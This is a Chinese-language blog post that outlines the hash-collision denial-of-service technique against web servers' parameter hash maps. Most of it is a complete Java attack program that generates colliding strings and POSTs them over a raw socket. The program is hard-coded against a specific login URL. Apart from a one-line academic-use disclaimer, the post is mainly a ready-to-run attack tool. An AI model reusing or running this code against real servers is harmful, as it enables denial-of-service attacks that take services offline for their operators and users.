最近看Web安全,看到最近这篇文章:Hash Collision DoS 问题 。
原理很简单,利用现有语言服务器的hash code实现缺陷,构造大量hash code相等的字符串,做成post的参数,让服务器忙于创建和查询hash map,从而是服务器拒绝服务。详细描述可以看上面那篇文章。
我试着写了个攻击的例子代码:
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.net.MalformedURLException;
import java.net.Socket;
import java.net.URL;
import java.util.ArrayList;
import java.util.List;
public class HashCollisionDosAttack {
private final String[] srcs= {"Aa", "BB"};
private List<String> getStrings(int n) {
List<String> strlist = new ArrayList<String>();
int round = (int) Math.pow(2, n);
for (int i = 0; i < round; ++i) {
strlist.add(getString(i, n));
}
return strlist;
}
private String getString(int index, int n) {
String str = "";
int[] bytes = getBytesOf(index, n);
for (int i = 0; i < bytes.length; ++i) {
str += srcs[bytes[i]];
}
return str;
}
private int[] getBytesOf(int index, int n) {
int[] bytes = new int[n];
for (int i = 0; i < n; ++i) {
bytes[n - i - 1] = 1 & (index >> i);
}
return bytes;
}
private void post(URL url, String params) {
Socket socket = null;
BufferedWriter bw = null;
BufferedReader br= null;
try {
socket = new Socket(url.getHost(), url.getPort());
bw = new BufferedWriter(new OutputStreamWriter(socket.getOutputStream()));
bw.write("POST " + url.getPath() + " HTTP/1.1\r\n");
bw.write("Host: " + url.getHost() + "\r\n");
bw.write("Content-Type: application/x-www-form-urlencoded\r\n");
bw.write("Content-Length: " + params.length() + "\r\n");
bw.write("Connection: Keep-Alive\r\n");
bw.write("\r\n");
bw.write(params);
bw.flush();
// br = new BufferedReader(new InputStreamReader(socket.getInputStream(),"UTF-8"));
// String line;
// while ((line = br.readLine()) != null) {
// System.out.println(line);
// }
// System.out.println(params);
} catch (Exception e) {
e.printStackTrace();
} finally {
if (null != socket) {
try {
socket.close();
} catch (IOException e) {
e.printStackTrace();
}
}
if (null != bw) {
try {
bw.close();
} catch (IOException e) {
e.printStackTrace();
}
}
if (null != br) {
try {
br.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
public void attack(String urlStr, int n) throws MalformedURLException {
String params = "";
for (int i = 1; i <= n; ++i) {
params += buildParams(getStrings(i));
}
URL url = new URL(urlStr);
post(url, params);
}
private String buildParams(List<String> strings) {
String params = "";
for (String str : strings) {
params += str + "=x&";
params.hashCode();
}
return params;
}
public static void main(String[] args) throws MalformedURLException {
HashCollisionDosAttack attack = new HashCollisionDosAttack();
attack.attack("http://frigile.com/login/login.htm", 15);
}
}
仅作学术交流,请勿用于非法目的。